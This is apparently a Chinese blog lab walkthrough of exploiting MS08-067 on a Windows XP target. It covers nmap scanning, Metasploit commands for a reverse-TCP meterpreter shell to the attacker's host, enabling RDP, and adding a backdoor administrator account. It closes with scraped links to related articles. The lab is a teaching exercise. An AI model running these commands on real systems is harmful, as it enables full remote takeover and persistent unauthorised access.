MS-08-067 windows smb服务 远程命令执行漏洞
漏洞概要
MS-08-067是Windows平台中smb
服务445端口的远程代码执行漏洞
利用成功可以远程控制主机
影响范围为:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
实验场景
攻击机:kali2022
msfconsole利用
靶机:windows xp
漏洞利用
使用ifconfig
和ipconfig
获取攻击机和靶机的IP地址
攻击机IP:172.16.1.117
靶机IP:172.16.1.116
nmap的默认脚本在/usr/share/nmap/scripts
,ls -l| grep 08-67
筛选漏洞相关模块
使用nmap
的漏洞扫描脚本smb-vuln-ms08-067
扫描靶机是否存在ms-08-067
漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n
发现存在漏洞,使用msfconsole
进行利用
msfconsole启动漏洞平台
查找漏洞利用脚本
search ms08_067
使用漏洞利用模块,并使用show options
查看漏洞利用模块配置参数
use exploit/windows/smb/ms08_067_netapi
show options
Required
为yes
是必须要设置的参数
在最新版kali
中,对常见的漏洞自动选择了合适的payload,例如这里的windows/meterpreter/reverse_tcp
,并且配置自动配置了反弹会话的IP地址和端口
就是我们本机的IP和端口
如果不是这个payload
需要我们手动设置
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444
观察我们必须设置目标的IP地址,就是RHOSTS
,这里如果是RHOST
是只可以设置一个IP地址,如果是RHOSTS
则可以设置一个网段,对一个网段进行攻击
设置目标IP
set RHOSTS 172.16.1.116
这里端口默认就是445端口,不在改变
这里有一个target
可以设置,target是用来指定靶机操作系统类型的,指定的准确的话,跟容易利用成功
show targets
可以查看可以设置的target
这里有很多taret,我么使用target代号为34的
set target 34
设置完成后,可以使用check
命令查看靶机是否存在这个漏洞,check
只有在一些常见的漏洞中可以使用
存在漏洞,使用命令exploit
或者run
进行漏洞利用
利用成功,成功获取靶机会话,并且权限为SYTEM
最高权限
后面我们可以开启靶机的3389端口,进行远程桌面连接
使用run getgui -e
开启靶机3389端口
netstat查看靶机3389端口是否开放
创建hacker
用户,并加入到Aministrators
默认管理员组
net user hacker 123456 /add
net localgroup Aministrators hacker /add
最后可以使用net user hacker
查看是否已经加入到管理员组
打开一个新的终端,连接靶机远程桌面
rdesktop -u hacker -p 123456 172.16.1.116
成功获取靶机权限
MS-08-067 windows smb服务 远程命令执行漏洞的更多相关文章
- 【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞
2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确 ...
- 高危Windows系统 SMB/RDP远程命令执行漏洞 手工修复办法
1.Windows Update更新补丁方式: 更新方法:点击“开始”->“控制面板”->“Windows Update” ,点击“检查更新”-“安装更新”: 2.检查安装结果: 点击“ ...
- Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现
一. 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ...
- Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测
本文作者:i春秋作家——Anythin9 1.漏洞简介 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 fals ...
- Supervisord远程命令执行漏洞(CVE-2017-11610)复现
Supervisord远程命令执行漏洞(CVE-2017-11610)复现 文章首发在安全客 https://www.anquanke.com/post/id/225451 写在前面 因为工作中遇到了 ...
- ThinkPHP 5.x远程命令执行漏洞复现
ThinkPHP 5.x远程命令执行漏洞复现 一.漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.th ...
- [转帖]安全公告【安全公告】CVE-2019-0708远程桌面服务远程代码执行漏洞
[安全公告]CVE-2019-0708远程桌面服务远程代码执行漏洞 https://www.landui.com/help/nshow-9716.html 漏洞层出不穷 漏洞信息: 2019年5月14 ...
- PHPMailer 远程命令执行漏洞 Writeup
漏洞概述 1.漏洞简介 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞.成功利用该漏洞后,攻击者可以远程任意代码执行.许多知名的 CMS 例如 Wordpress 等都是使用这个组件来 ...
- FastJson远程命令执行漏洞学习笔记
FastJson远程命令执行漏洞学习笔记 Fastjson简介 fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean.fastjson.ja ...
- FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
随机推荐
- java 泛型使用
泛型类 // 简单泛型 class Point<T>{ // 此处可以随便写标识符号,T是type的简称 private T var ; public T getVar(){ return ...
- MFC中利用CFileDialog选择文件并读取文件所遇到的问题和解决方法
在用MFC编写一个上位机时,需要实现选择和读取一个二进制文件,本来以为很简单的但是在实现过程中遇到很多问题,所幸都一一解决,这里做一下记录. 首先在实现文件选择,在界面上设置一个按钮,并在点击事件函数 ...
- pandas、matplotlib常用命令(收集整理)
1 import matplotlib.pyplot as plt 2 import pandas as pd 3 import matplotlib as mpl 含有中文无法正常显示,需增加如下代 ...
- STM32工程建立
STM32工程建立 对于用keil5建立stm32工程有两种方法,一种在学习过程中比较方便的建立方式:我们称为工程方式一,另一个便是在实际工程中用的最多,也最普遍,在实际过程中用的最多的,我们称为工程 ...
- snorkel SentenceNgramViewer 标记时出现 Integrity Error
Snorkel使用SQLAlchemy作为数据管理工具,在本地会生成一个.db文件,现有操作与.db文件中已有的记录重复,违反了数据库主键不能重复的性质 解决方式: You can load a la ...
- uiautomator2自动化工具的下载与安装
前言: 相信很多使用appium做过APP自动化的人都深有感触: 1,安装麻烦,配置环境可能会难道不少人 2,appium运行慢.时间长 3,uiautomatorviewer定位元素时得关掉appi ...
- Java中finalize()方法的使用
参考:https://blog.csdn.net/m0_64624615/article/details/126326921 垃圾回收器
- mysql查询mapper返参类型为List
List<String> lists = mapper.select(); 返参类型为List,查询没有数据的时候,lists不会为null,lists.size() 为 0.
- core程序实现文件下载
已知本地文件名,返回给前台流 string filepath = path +"/" + filename +".txt"; if(System.IO.File ...
- 20220718 第七组 陈美娜 java
如果把变量直接声明在类里:成员变量(全局变量)成员变量->属性 如果把变量声明在某个方法里:局部变量 public:访问权限修饰符,后面讲 void:没有返回值 run():方法名,标识符 {} ...